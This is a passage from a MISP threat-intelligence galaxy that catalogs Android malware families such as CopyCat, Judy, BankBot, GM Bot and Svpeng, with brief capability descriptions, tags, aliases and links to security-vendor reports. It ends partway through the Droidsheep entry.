CopyCat is a fully developed malware with vast capabilities, including rooting devices, establishing persistency, and injecting code into Zygote – a daemon responsible for launching apps in the Android operating system – that allows the malware to control any activity on the device.

The tag is: misp-galaxy:android="CopyCat"

Table 43. Table References

Links

https://blog.checkpoint.com/2017/07/06/how-the-copycat-malware-infected-android-devices-around-the-world/

Andr/Dropr-FH

Andr/Dropr-FH can silently record audio and video, monitor texts and calls, modify files, and ultimately spawn ransomware.

The tag is: misp-galaxy:android="Andr/Dropr-FH"

Andr/Dropr-FH is also known as:

  • GhostCtrl

Andr/Dropr-FH has relationships with:

  • similar: misp-galaxy:malpedia="GhostCtrl" with estimative-language:likelihood-probability="likely"

Table 44. Table References

Links

https://nakedsecurity.sophos.com/2017/07/21/watch-out-for-the-android-malware-that-snoops-on-your-phone/

https://www.neowin.net/news/the-ghostctrl-android-malware-can-silently-record-your-audio-and-steal-sensitive-data

Judy

The malware, dubbed Judy, is an auto-clicking adware which was found on 41 apps developed by a Korean company. The malware uses infected devices to generate large amounts of fraudulent clicks on advertisements, generating revenues for the perpetrators behind it.

The tag is: misp-galaxy:android="Judy"

Table 45. Table References

Links

http://fortune.com/2017/05/28/android-malware-judy/

https://blog.checkpoint.com/2017/05/25/judy-malware-possibly-largest-malware-campaign-found-google-play/

RedAlert2

The trojan waits in hiding until the user opens a banking or social media app. When this happens, the trojan shows an HTML-based overlay on top of the original app, alerting the user of an error, and asking to reauthenticate. Red Alert then collects the user’s credentials and sends them to its C&C server.

The tag is: misp-galaxy:android="RedAlert2"

RedAlert2 has relationships with:

  • similar: misp-galaxy:malpedia="RedAlert2" with estimative-language:likelihood-probability="likely"

Table 46. Table References

Links

https://www.bleepingcomputer.com/news/security/researchers-discover-new-android-banking-trojan/

https://www.threatfabric.com/blogs/new_android_trojan_targeting_over_60_banks_and_social_apps.html

Tizi

Tizi is a fully featured backdoor that installs spyware to steal sensitive data from popular social media applications. The Google Play Protect security team discovered this family in September 2017 when device scans found an app with rooting capabilities that exploited old vulnerabilities. The team used this app to find more applications in the Tizi family, the oldest of which is from October 2015. The Tizi app developer also created a website and used social media to encourage more app installs from Google Play and third-party websites.

The tag is: misp-galaxy:android="Tizi"

Table 47. Table References

Links

https://security.googleblog.com/2017/11/tizi-detecting-and-blocking-socially.html

DoubleLocker

DoubleLocker can change the device’s PIN, preventing victims from accessing their devices, and also encrypts the data requesting a ransom. It will misuse accessibility services after being installed by impersonating the Adobe Flash player - similar to BankBot.

The tag is: misp-galaxy:android="DoubleLocker"

DoubleLocker has relationships with:

  • similar: misp-galaxy:malpedia="DoubleLocker" with estimative-language:likelihood-probability="likely"

Table 48. Table References

Links

https://www.welivesecurity.com/2017/10/13/doublelocker-innovative-android-malware/

Svpeng

Svpeng is a Banking trojan which acts as a keylogger. If the Android device is not Russian, Svpeng will ask for permission to use accessibility services. In abusing this service it will gain administrator rights allowing it to draw over other apps, send and receive SMS and take screenshots when keys are pressed.

The tag is: misp-galaxy:android="Svpeng"

Svpeng is also known as:

  • Invisble Man

Svpeng has relationships with:

  • similar: misp-galaxy:tool="Svpeng" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Svpeng" with estimative-language:likelihood-probability="likely"

Table 49. Table References

Links

https://securelist.com/a-new-era-in-mobile-banking-trojans/79198/

https://www.theregister.co.uk/2017/08/02/banking_android_malware_in_uk/

LokiBot

LokiBot is a banking trojan for Android 4.0 and higher. It can steal the information and send SMS messages. It has the ability to start web browsers, and banking applications, along with showing notifications impersonating other apps. Upon attempt to remove it will encrypt the devices' external storage requiring Bitcoins to decrypt files.

The tag is: misp-galaxy:android="LokiBot"

LokiBot has relationships with:

  • similar: misp-galaxy:malpedia="Loki Password Stealer (PWS)" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="LokiBot" with estimative-language:likelihood-probability="likely"

Table 50. Table References

Links

https://clientsidedetection.com/lokibot_the_first_hybrid_android_malware.html

BankBot

The main goal of this malware is to steal banking credentials from the victim’s device. It usually impersonates flash player updaters, android system tools, or other legitimate applications.

The tag is: misp-galaxy:android="BankBot"

BankBot has relationships with:

  • similar: misp-galaxy:malpedia="Anubis (Android)" with estimative-language:likelihood-probability="likely"

Table 51. Table References

Links

https://blog.fortinet.com/2017/09/19/a-look-into-the-new-strain-of-bankbot

https://forensics.spreitzenbarth.de/android-malware/

https://blog.avast.com/mobile-banking-trojan-sneaks-into-google-play-targeting-wells-fargo-chase-and-citibank-customers

Viking Horde

In rooted devices, Viking Horde installs software and executes code remotely to get access to the mobile data.

The tag is: misp-galaxy:android="Viking Horde"

Table 52. Table References

Links

http://www.alwayson-network.com/worst-types-android-malware-2016/

HummingBad

A Chinese advertising company has developed this malware. The malware has the power to take control of devices; it forces users to click advertisements and download apps. The malware uses a multistage attack chain.

The tag is: misp-galaxy:android="HummingBad"

HummingBad has relationships with:

  • similar: misp-galaxy:mitre-malware="HummingBad - S0322" with estimative-language:likelihood-probability="likely"

Table 53. Table References

Links

http://www.alwayson-network.com/worst-types-android-malware-2016/

http://blog.checkpoint.com/wp-content/uploads/2016/07/HummingBad-Research-report_FINAL-62916.pdf

Ackposts

Ackposts is a Trojan horse for Android devices that steals the Contacts information from the compromised device and sends it to a predetermined location.

The tag is: misp-galaxy:android="Ackposts"

Table 54. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-072302-3943-99

Wirex

Wirex is a Trojan horse for Android devices that opens a backdoor on the compromised device which then joins a botnet for conducting click fraud.

The tag is: misp-galaxy:android="Wirex"

Table 55. Table References

Links

https://krebsonsecurity.com/2017/08/tech-firms-team-up-to-take-down-wirex-android-ddos-botnet/

http://www.zdnet.com/article/wirex-ddos-malware-given-udp-flood-capabilities/

WannaLocker

WannaLocker is a strain of ransomware for Android devices that encrypts files on the device’s external storage and demands a payment to decrypt them.

The tag is: misp-galaxy:android="WannaLocker"

Table 56. Table References

Links

https://fossbytes.com/wannalocker-ransomware-wannacry-android/

Switcher

Switcher is a Trojan horse for Android devices that modifies Wi-Fi router DNS settings. Swticher attempts to infiltrate a router’s admin interface on the devices' WIFI network by using brute force techniques. If the attack succeeds, Switcher alters the DNS settings of the router, making it possible to reroute DNS queries to a network controlled by the malicious actors.

The tag is: misp-galaxy:android="Switcher"

Switcher has relationships with:

  • similar: misp-galaxy:malpedia="Switcher" with estimative-language:likelihood-probability="likely"

Table 57. Table References

Links

http://www.zdnet.com/article/this-android-infecting-trojan-malware-uses-your-phone-to-attack-your-router/

https://www.theregister.co.uk/2017/01/03/android_trojan_targets_routers/

https://www.symantec.com/security_response/writeup.jsp?docid=2017-090410-0547-99

Vibleaker

Vibleaker was an app available on the Google Play Store named Beaver Gang Counter that contained malicious code that after specific orders from its maker would scan the user’s phone for the Viber app, and then steal photos and videos recorded or sent through the app.

The tag is: misp-galaxy:android="Vibleaker"

Table 58. Table References

Links

http://news.softpedia.com/news/malicious-android-app-steals-viber-photos-and-BankBot-505758.shtml

ExpensiveWall

ExpensiveWall is Android malware that sends fraudulent premium SMS messages and charges users accounts for fake services without their knowledge

The tag is: misp-galaxy:android="ExpensiveWall"

Table 59. Table References

Links

https://blog.checkpoint.com/2017/09/14/expensivewall-dangerous-packed-malware-google-play-will-hit-wallet/

http://fortune.com/2017/09/14/google-play-android-malware/

Cepsohord

Cepsohord is a Trojan horse for Android devices that uses compromised devices to commit click fraud, modify DNS settings, randomly delete essential files, and download additional malware such as ransomware.

The tag is: misp-galaxy:android="Cepsohord"

Table 60. Table References

Links

https://www.cyber.nj.gov/threat-profiles/android-malware-variants/cepsohord

Fakem Rat

Fakem RAT makes their network traffic look like well-known protocols (e.g. Messenger traffic, HTML pages).

The tag is: misp-galaxy:android="Fakem Rat"

Table 61. Table References

Links

https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-fakem-rat.pdf

https://www.symantec.com/security_response/writeup.jsp?docid=2016-012608-1538-99

GM Bot

GM Bot – also known as Acecard, SlemBunk, or Bankosy – scams people into giving up their banking log-in credentials and other personal data by displaying overlays that look nearly identical to banking apps log-in pages. Subsequently, the malware intercepts SMS to obtain two-factor authentication PINs, giving cybercriminals full access to bank accounts.

The tag is: misp-galaxy:android="GM Bot"

GM Bot is also known as:

  • Acecard

  • SlemBunk

  • Bankosy

GM Bot has relationships with:

  • similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Bankosy" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 62. Table References

Links

https://blog.avast.com/android-trojan-gm-bot-is-evolving-and-targeting-more-than-50-banks-worldwide

Moplus

The Wormhole vulnerability in the Moplus SDK could be exploited by hackers to open an unsecured and unauthenticated HTTP server connection on the user’s device, and this connection is established in the background without the user’s knowledge.

The tag is: misp-galaxy:android="Moplus"

Table 63. Table References

Links

http://securityaffairs.co/wordpress/41681/hacking/100m-android-device-baidu-moplus-sdk.html

Adwind

Adwind is a backdoor written purely in Java that targets system supporting the Java runtime environment. Commands that can be used, among other things, to display messages on the system, open URLs, update the malware, download/execute files, and download/load plugins. According to the author, the backdoor component can run on Windows, Mac OS, Linux and Android platforms providing rich capabilities for remote control, data gathering, data exfiltration and lateral movement.

The tag is: misp-galaxy:android="Adwind"

Adwind is also known as:

  • AlienSpy

  • Frutas

  • Unrecom

  • Sockrat

  • Jsocket

  • jRat

  • Backdoor:Java/Adwind

Adwind has relationships with:

  • similar: misp-galaxy:rat="Adwind RAT" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="Adwind" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="Sockrat" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="AdWind" with estimative-language:likelihood-probability="likely"

Table 64. Table References

Links

https://securelist.com/adwind-faq/73660/

AdSms

Adsms is a Trojan horse that may send SMS messages from Android devices.

The tag is: misp-galaxy:android="AdSms"

Table 65. Table References

Links

https://www.fortiguard.com/encyclopedia/virus/7389670

https://www.symantec.com/security_response/writeup.jsp?docid=2011-051313-4039-99

Airpush

Airpush is a very aggresive Ad - Network

The tag is: misp-galaxy:android="Airpush"

Airpush is also known as:

  • StopSMS

Table 66. Table References

Links

https://crypto.stanford.edu/cs155old/cs155-spring16/lectures/18-mobile-malware.pdf

BeanBot

BeanBot forwards device’s data to a remote server and sends out premium-rate SMS messages from the infected device.

The tag is: misp-galaxy:android="BeanBot"

Table 67. Table References

Links

https://www.f-secure.com/v-descs/trojan_android_beanbot.shtml

Kemoge

Kemoge is adware that disguises itself as popular apps via repackaging, then allows for a complete takeover of the users Android device.

The tag is: misp-galaxy:android="Kemoge"

Kemoge has relationships with:

  • similar: misp-galaxy:mitre-malware="ShiftyBug - S0294" with estimative-language:likelihood-probability="likely"

Table 68. Table References

Links

https://www.fireeye.com/blog/threat-research/2015/10/kemoge_another_mobi.html

https://www.symantec.com/security_response/writeup.jsp?docid=2015-101207-3555-99

Ghost Push

Ghost Push is a family of malware that infects the Android OS by automatically gaining root access, downloading malicious software, masquerading as a system app, and then losing root access, which then makes it virtually impossible to remove the infection even by factory reset unless the firmware is reflashed.

The tag is: misp-galaxy:android="Ghost Push"

Table 69. Table References

Links

https://en.wikipedia.org/wiki/Ghost_Push

https://blog.avast.com/how-to-protect-your-android-device-from-ghost-push

BeNews

The BeNews app is a backdoor app that uses the name of defunct news site BeNews to appear legitimate. After installation it bypasses restrictions and downloads additional threats to the compromised device.

The tag is: misp-galaxy:android="BeNews"

Table 70. Table References

Links

http://blog.trendmicro.com/trendlabs-security-intelligence/fake-news-app-in-hacking-team-dump-designed-to-bypass-google-play/

Accstealer

Accstealer is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Accstealer"

Table 71. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-012711-1159-99

Acnetdoor

Acnetdoor is a detection for Trojan horses on the Android platform that open a back door on the compromised device.

The tag is: misp-galaxy:android="Acnetdoor"

Table 72. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051611-4258-99

Acnetsteal

Acnetsteal is a detection for Trojan horses on the Android platform that steal information from the compromised device.

The tag is: misp-galaxy:android="Acnetsteal"

Table 73. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-051612-0505-99

Actech

Actech is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Actech"

Table 74. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080111-3948-99

AdChina

AdChina is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdChina"

Table 75. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-2947-99

Adfonic

Adfonic is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adfonic"

Table 76. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052615-0024-99

AdInfo

AdInfo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdInfo"

Table 77. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-2433-99

Adknowledge

Adknowledge is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adknowledge"

Table 78. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-1033-99

AdMarvel

AdMarvel is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMarvel"

Table 79. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-060621-2450-99

AdMob

AdMob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AdMob"

Table 80. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052822-3437-99

Adrd

Adrd is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Adrd"

Table 81. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-021514-4954-99

Aduru

Aduru is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Aduru"

Table 82. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-2419-99

Adwhirl

Adwhirl is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwhirl"

Table 83. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1414-99

Adwlauncher

Adwlauncher is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Adwlauncher"

Table 84. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-082308-1823-99

Adwo

Adwo is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Adwo"

Table 85. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032814-5806-99

Airad

Airad is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Airad"

Table 86. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-1704-99

Alienspy

Alienspy is a Trojan horse for Android devices that steals information from the compromised device. It may also download potentially malicious files.

The tag is: misp-galaxy:android="Alienspy"

Table 87. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-042714-5942-99

AmazonAds

AmazonAds is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AmazonAds"

Table 88. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052618-5002-99

Answerbot

Answerbot is a Trojan horse that opens a back door on Android devices.

The tag is: misp-galaxy:android="Answerbot"

Table 89. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-100711-2129-99

Antammi

Antammi is a Trojan horse that steals information from Android devices.

The tag is: misp-galaxy:android="Antammi"

Table 90. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-032106-5211-99

Apkmore

Apkmore is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apkmore"

Table 91. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040113-4813-99

Aplog

Aplog is a Trojan horse for Android devices that steals information from the device.

The tag is: misp-galaxy:android="Aplog"

Table 92. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-100911-1023-99

Appenda

Appenda is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Appenda"

Table 93. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-062812-0516-99

Apperhand

Apperhand is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Apperhand"

Table 94. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-032815-5637-99

Appleservice

Appleservice is a Trojan horse for Android devices that may steal information from the compromised device.

The tag is: misp-galaxy:android="Appleservice"

Table 95. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031011-4321-99

AppLovin

AppLovin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="AppLovin"

Table 96. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040112-1739-99

Arspam

Arspam is a Trojan horse for Android devices that sends spam SMS messages to contacts on the compromised device.

The tag is: misp-galaxy:android="Arspam"

Table 97. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-121915-3251-99

Aurecord

Aurecord is a spyware application for Android devices that allows the device it is installed on to be monitored.

The tag is: misp-galaxy:android="Aurecord"

Table 98. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-031914-2310-99

Backapp

Backapp is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Backapp"

Table 99. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-092708-5017-99

Backdexer

Backdexer is a Trojan horse for Android devices that may send premium-rate SMS messages from the compromised device.

The tag is: misp-galaxy:android="Backdexer"

Table 100. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121812-2502-99

Backflash

Backflash is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Backflash"

Table 101. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-091714-0427-99

Backscript

Backscript is a Trojan horse for Android devices that downloads files onto the compromised device.

The tag is: misp-galaxy:android="Backscript"

Table 102. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-090704-3639-99

Badaccents

Badaccents is a Trojan horse for Android devices that may download apps on the compromised device.

The tag is: misp-galaxy:android="Badaccents"

Table 103. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-123015-3618-99

Badpush

Badpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Badpush"

Table 104. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040311-4133-99

Ballonpop

Ballonpop is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Ballonpop"

Table 105. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-120911-1731-99

Bankosy

Bankosy is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Bankosy"

Bankosy has relationships with:

  • similar: misp-galaxy:tool="Slempo" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:android="GM Bot" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Slempo" with estimative-language:likelihood-probability="likely"

Table 106. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-072316-5249-99

Bankun

Bankun is a Trojan horse for Android devices that replaces certain banking applications on the compromised device.

The tag is: misp-galaxy:android="Bankun"

Table 107. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-072318-4143-99

Basebridge

Basebridge is a Trojan horse that attempts to send premium-rate SMS messages to predetermined numbers.

The tag is: misp-galaxy:android="Basebridge"

Table 108. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-060915-4938-99

Basedao

Basedao is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Basedao"

Table 109. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-061715-3303-99

Batterydoctor

Batterydoctor is Trojan that makes exaggerated claims about the device’s ability to recharge the battery, as well as steal information.

The tag is: misp-galaxy:android="Batterydoctor"

Table 110. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-101916-0847-99

Beaglespy

Beaglespy is an Android mobile detection for the Beagle spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Beaglespy"

Table 111. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091010-0627-99

Becuro

Becuro is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Becuro"

Table 112. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-051410-3348-99

Beita

Beita is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Beita"

Table 113. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-110111-1829-99

Bgserv

Bgserv is a Trojan that opens a back door and transmits information from the device to a remote location.

The tag is: misp-galaxy:android="Bgserv"

Table 114. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-031005-2918-99

Biigespy

Biigespy is an Android mobile detection for the Biige spyware program as well as its associated client application.

The tag is: misp-galaxy:android="Biigespy"

Table 115. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-091012-0526-99

Bmaster

Bmaster is a Trojan horse on the Android platform that opens a back door, downloads files and steals potentially confidential information from the compromised device.

The tag is: misp-galaxy:android="Bmaster"

Table 116. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-020609-3003-99

Bossefiv

Bossefiv is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Bossefiv"

Table 117. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-061520-4322-99

Boxpush

Boxpush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Boxpush"

Table 118. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-4613-99

Burstly

Burstly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Burstly"

Table 119. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1443-99

Buzzcity

Buzzcity is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Buzzcity"

Table 120. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052918-1454-99

ByPush

ByPush is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="ByPush"

Table 121. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040315-4708-99

Cajino

Cajino is a Trojan horse for Android devices that opens a back door on the compromised device.

The tag is: misp-galaxy:android="Cajino"

Table 122. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-040210-3746-99

Casee

Casee is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Casee"

Table 123. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3501-99

Catchtoken

Catchtoken is a Trojan horse for Android devices that intercepts SMS messages and opens a back door on the compromised device.

The tag is: misp-galaxy:android="Catchtoken"

Table 124. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-121619-0548-99

Cauly

Cauly is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cauly"

Table 125. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-052919-3454-99

Cellshark

Cellshark is a spyware application for Android devices that periodically gathers information from the device and uploads it to a predetermined location.

The tag is: misp-galaxy:android="Cellshark"

Table 126. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111611-0914-99

Centero

Centero is a Trojan horse for Android devices that displays advertisements on the compromised device.

The tag is: misp-galaxy:android="Centero"

Table 127. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-053006-2502-99

Chuli

Chuli is a Trojan horse for Android devices that opens a back door and may steal information from the compromised device.

The tag is: misp-galaxy:android="Chuli"

Table 128. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-032617-1604-99

Citmo

Citmo is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Citmo"

Table 129. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030715-5012-99

Claco

Claco is a Trojan horse for Android devices that steals information from the compromised device.

The tag is: misp-galaxy:android="Claco"

Table 130. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-020415-5600-99

Clevernet

Clevernet is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Clevernet"

Table 131. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-5257-99

Cnappbox

Cnappbox is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Cnappbox"

Table 132. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040215-1141-99

Cobblerone

Cobblerone is a spyware application for Android devices that can track the phone’s location and remotely erase the device.

The tag is: misp-galaxy:android="Cobblerone"

Table 133. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-111514-3846-99

Coolpaperleak

Coolpaperleak is a Trojan horse for Android devices that steals information and sends it to a remote location.

The tag is: misp-galaxy:android="Coolpaperleak"

Table 134. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-080211-5757-99

Coolreaper

Coolreaper is a Trojan horse for Android devices that opens a back door on the compromised device. It may also steal information and download potentially malicious files.

The tag is: misp-galaxy:android="Coolreaper"

Table 135. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-011220-3211-99

Cosha

Cosha is a spyware program for Android devices that monitors and sends certain information to a remote location.

The tag is: misp-galaxy:android="Cosha"

Table 136. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-081712-5231-99

Counterclank

Counterclank is a Trojan horse for Android devices that steals information.

The tag is: misp-galaxy:android="Counterclank"

Table 137. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-012709-4046-99

Crazymedia

Crazymedia is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Crazymedia"

Table 138. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040312-2547-99

Crisis

Crisis is a Trojan horse for Android devices that opens a back door and steals information from the compromised device.

The tag is: misp-galaxy:android="Crisis"

Crisis has relationships with:

  • similar: misp-galaxy:malpedia="RCS" with estimative-language:likelihood-probability="likely"

Table 139. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-071409-0636-99

Crusewind

Crusewind is a Trojan horse for Android devices that sends SMS messages to a premium-rate number.

The tag is: misp-galaxy:android="Crusewind"

Table 140. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-070301-5702-99

Dandro

Dandro is a Trojan horse for Android devices that allows a remote attacker to gain control over the device and steal information from it.

The tag is: misp-galaxy:android="Dandro"

Table 141. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2013-012916-2128-99

Daoyoudao

Daoyoudao is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Daoyoudao"

Table 142. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040214-5018-99

Deathring

Deathring is a Trojan horse for Android devices that may perform malicious activities on the compromised device.

The tag is: misp-galaxy:android="Deathring"

Table 143. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-121116-4547-99

Deeveemap

Deeveemap is a Trojan horse for Android devices that downloads potentially malicious files onto the compromised device.

The tag is: misp-galaxy:android="Deeveemap"

Table 144. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2017-060907-5221-99

Dendoroid

Dendoroid is a Trojan horse for Android devices that opens a back door, steals information, and may perform other malicious activities on the compromised device.

The tag is: misp-galaxy:android="Dendoroid"

Table 145. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-030418-2633-99

Dengaru

Dengaru is a Trojan horse for Android devices that performs click-fraud from the compromised device.

The tag is: misp-galaxy:android="Dengaru"

Table 146. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2015-051113-4819-99

Diandong

Diandong is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Diandong"

Table 147. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040207-2453-99

Dianjin

Dianjin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dianjin"

Table 148. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040107-0313-99

Dogowar

Dogowar is a Trojan horse on the Android platform that sends SMS texts to all contacts on the device. It is a repackaged version of a game application called Dog Wars, which can be downloaded from a third party market and must be manually installed.

The tag is: misp-galaxy:android="Dogowar"

Table 149. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2011-081510-4323-99

Domob

Domob is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Domob"

Table 150. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-040416-4235-99

Dougalek

Dougalek is a Trojan horse for Android devices that steals information from the compromised device. The threat is typically disguised to display a video.

The tag is: misp-galaxy:android="Dougalek"

Table 151. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2012-041601-3400-99

Dowgin

Dowgin is an advertisement library that is bundled with certain Android applications.

The tag is: misp-galaxy:android="Dowgin"

Table 152. Table References

Links

https://www.symantec.com/security_response/writeup.jsp?docid=2014-033108-4723-99

Droidsheep

Droidsheep is a hacktool for Android devices that hijacks social networking accounts on compromised devices.

The tag is: misp-galaxy:android="Droidsheep"

Table 153. Table References

Links

